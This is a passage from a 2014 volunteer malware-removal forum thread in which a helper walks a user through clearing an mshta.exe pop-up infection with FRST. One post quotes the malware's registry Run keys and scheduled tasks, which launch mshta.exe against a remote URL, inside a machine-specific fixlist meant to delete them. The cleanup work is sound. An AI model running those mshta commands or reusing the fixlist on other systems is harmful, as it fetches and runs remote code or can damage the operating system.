Let me ask you. Where are you getting this Japanese Porn Site adds, is it when you open your browser, if so which one ?
WE'RE SURE THAT YOU'LL LOVE US!
Hey there! 
Looks like you're enjoying the discussion, but you're not signed up for an account. When you create an account, we remember exactly what you've read, so you always come right back where you left off. You also get notifications, here and via email, whenever new posts are made. You can like posts to share the love. 
Join 93085 other members! Anybody can ask, anybody can answer. Consistently helpful members may be invited to become staff. Here's how it works. Virus cleanup? Start here -> Malware Removal Forum.
Try What the Tech -- It's free!
mshta.exe virus! can you help pls TB-Psychotic or anyone? [Solved
Started by
kunash
, Jun 15 2014 06:38 AM
-
This topic is locked
72 replies to this topic
#61
ken545
-
- Retired Classroom Teacher
-
- 23,225 posts
Forum God
- Interests:Fighting Malware and cooking some great Italian and TexMex food
-
Posted 23 June 2014 - 01:02 PM
The forum is staffed by volunteers who donate their time and expertise.
If you feel you have been helped, please consider a donation.
Find us on Facebook
Please LIKE and SHARE
Just a reminder that threads will be closed if no reply in 3 days.
Register to Remove
#62
ken545
-
- Retired Classroom Teacher
-
- 23,225 posts
Forum God
- Interests:Fighting Malware and cooking some great Italian and TexMex food
-
Posted 23 June 2014 - 02:21 PM
We may have found the answer, thanks to Farbar the author of FRST
Go ahead and run a new scan with FRST and I need to see the Addition.txt log also
The forum is staffed by volunteers who donate their time and expertise.
If you feel you have been helped, please consider a donation.
Find us on Facebook
Please LIKE and SHARE
Just a reminder that threads will be closed if no reply in 3 days.
#63
kunash
-
- Authentic Member
-
- 73 posts
Authentic Member
Posted 24 June 2014 - 01:23 AM
I turn the computer on - goes to desktop - and about 10 seconds later it pops up in the bottom right corner. no browsers are open
#64
kunash
-
- Authentic Member
-
- 73 posts
Authentic Member
Posted 24 June 2014 - 01:40 AM
you need to see the additions log - is that the original one I posted on page 1?
previously you said
''the first time the tool (frst) is run it generates another log - additions.txt. ''
i have only ever seen this log the first time I ran frst. I have just run frst and only frst.exe log is produced. do you want me to delete the frst program and download it again?
#65
ken545
-
- Retired Classroom Teacher
-
- 23,225 posts
Forum God
- Interests:Fighting Malware and cooking some great Italian and TexMex food
-
Posted 24 June 2014 - 04:45 AM
No, just go ahead and post a new FRST log, we found out how to get rid of this
The forum is staffed by volunteers who donate their time and expertise.
If you feel you have been helped, please consider a donation.
Find us on Facebook
Please LIKE and SHARE
Just a reminder that threads will be closed if no reply in 3 days.
#66
ken545
-
- Retired Classroom Teacher
-
- 23,225 posts
Forum God
- Interests:Fighting Malware and cooking some great Italian and TexMex food
-
Posted 24 June 2014 - 05:06 AM
When you open up FRST, put a checkmark in addition.txt and it will create a new addition file, I would rather use a current one if we can
The forum is staffed by volunteers who donate their time and expertise.
If you feel you have been helped, please consider a donation.
Find us on Facebook
Please LIKE and SHARE
Just a reminder that threads will be closed if no reply in 3 days.
#67
ken545
-
- Retired Classroom Teacher
-
- 23,225 posts
Forum God
- Interests:Fighting Malware and cooking some great Italian and TexMex food
-
Posted 24 June 2014 - 06:21 AM
When you can get me the news logs and lets get rid of this pest
The forum is staffed by volunteers who donate their time and expertise.
If you feel you have been helped, please consider a donation.
Find us on Facebook
Please LIKE and SHARE
Just a reminder that threads will be closed if no reply in 3 days.
#68
kunash
-
- Authentic Member
-
- 73 posts
Authentic Member
Posted 24 June 2014 - 07:25 AM
ok here we go........
Attached Files
-
Addition.txt 34.23KB
203 downloads
-
FRST.txt 59.58KB
200 downloads
#69
ken545
-
- Retired Classroom Teacher
-
- 23,225 posts
Forum God
- Interests:Fighting Malware and cooking some great Italian and TexMex food
-
Posted 24 June 2014 - 07:54 AM
Thanks for the logs, hopefully this will take care of it
Again if you have an old fixlist txt log drag it to the trash
Open notepad (Start =>All Programs => Accessories => Notepad).
Please copy the entire contents of the code box below.
(To do this highlight the contents of the box, right click on it and select copy. Right-click in the open notepad and select Paste).
Save it to the same direction as frst.exe (or frst64.exe) as fixlist.txt.
StartHKU\S-1-5-21-2615214989-2497064625-3642582449-1000\...\Run: [SystemBooteHQ088Vh8yxWhinGduq9jR1yJP8FDAh2] => mshta.exe http://gvn.dogmwijx....yJP8FDAh2&log=1HKU\S-1-5-21-2615214989-2497064625-3642582449-1000\...\Run: [RegWriteeHQ088Vh8yxWhinGduq9jR1yJP8FDAh2] => mshta.exe http://gvn.dogmwijx....uq9jR1yJP8FDAh2HKU\S-1-5-21-2615214989-2497064625-3642582449-1000\...\RunOnce: [RegWriteeHQ088Vh8yxWhinGduq9jR1yJP8FDAh2] - mshta.exe http://gvn.dogmwijx....uq9jR1yJP8FDAh2Task: {4B0556EC-44EC-49B3-967D-83853E99056E} - \Speedial No Task File <==== ATTENTIONTask: {794B6FE8-AB93-47EE-AC9A-021679F6C4C0} - \Digital Sites No Task File <==== ATTENTIONTask: {605B88AA-58C3-42CA-8A38-671AD6887413} - System32\Tasks\RegWrite => mshta.exe http://gvn.dogmwijx....uq9jR1yJP8FDAh2Task: {79C796C6-C03E-472D-8E39-517211FC7840} - System32\Tasks\SystemBoot => mshta.exe http://gvn.dogmwijx....uq9jR1yJP8FDAh2Task: {605B88AA-58C3-42CA-8A38-671AD6887413} - System32\Tasks\RegWrite => C:\Windows\system32\mshta.exe [2014-05-08] (Microsoft Corporation)
Task: {79C796C6-C03E-472D-8E39-517211FC7840} - System32\Tasks\SystemBoot => C:\Windows\system32\mshta.exe [2014-05-08] (MicrosoftHosts:End
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
Then open FRST64 and click on fix
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
The forum is staffed by volunteers who donate their time and expertise.
If you feel you have been helped, please consider a donation.
Find us on Facebook
Please LIKE and SHARE
Just a reminder that threads will be closed if no reply in 3 days.
#70
kunash
-
- Authentic Member
-
- 73 posts
Authentic Member
Posted 24 June 2014 - 09:24 AM
rebooted and waiting a bit.................
waiting..................... ( for the pop up )
nothing yet
still waiting..................
just to be certain
I think you have cracked it. no pop up.
excellent.
thank you very much for your time and patience and help.
as a thank you I will make a donation via paypal to help fund the website.
thanks again
( I will post in the next few days about my wifes computer )
Attached Files
-
Fixlog.txt 4.37KB
237 downloads
Register to Remove
#71
ken545
-
- Retired Classroom Teacher
-
- 23,225 posts
Forum God
- Interests:Fighting Malware and cooking some great Italian and TexMex food
-
Posted 24 June 2014 - 09:29 AM
Great, lets give another day , use your computer normally and let me know how its going
The forum is staffed by volunteers who donate their time and expertise.
If you feel you have been helped, please consider a donation.
Find us on Facebook
Please LIKE and SHARE
Just a reminder that threads will be closed if no reply in 3 days.
#72
ken545
-
- Retired Classroom Teacher
-
- 23,225 posts
Forum God
- Interests:Fighting Malware and cooking some great Italian and TexMex food
-
Posted 24 June 2014 - 11:12 AM
Thank You 
The forum is staffed by volunteers who donate their time and expertise.
If you feel you have been helped, please consider a donation.
Find us on Facebook
Please LIKE and SHARE
Just a reminder that threads will be closed if no reply in 3 days.
#73
ken545
-
- Retired Classroom Teacher
-
- 23,225 posts
Forum God
- Interests:Fighting Malware and cooking some great Italian and TexMex food
-
Posted 30 June 2014 - 06:02 AM
Since this issue appears to be resolved ... this Topic has been closed. Glad we could be of assistance.
If you're the topic starter, and need this topic reopened, please contact a staff member with the address of the thread.
Everyone else please follow the instructions here http://forums.whatth...ed_t106388.html
and start a New Topic.
If you're the topic starter, and need this topic reopened, please contact a staff member with the address of the thread.
Everyone else please follow the instructions here http://forums.whatth...ed_t106388.html
and start a New Topic.
The forum is staffed by volunteers who donate their time and expertise.
If you feel you have been helped, please consider a donation.
Find us on Facebook
Please LIKE and SHARE
Just a reminder that threads will be closed if no reply in 3 days.
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users
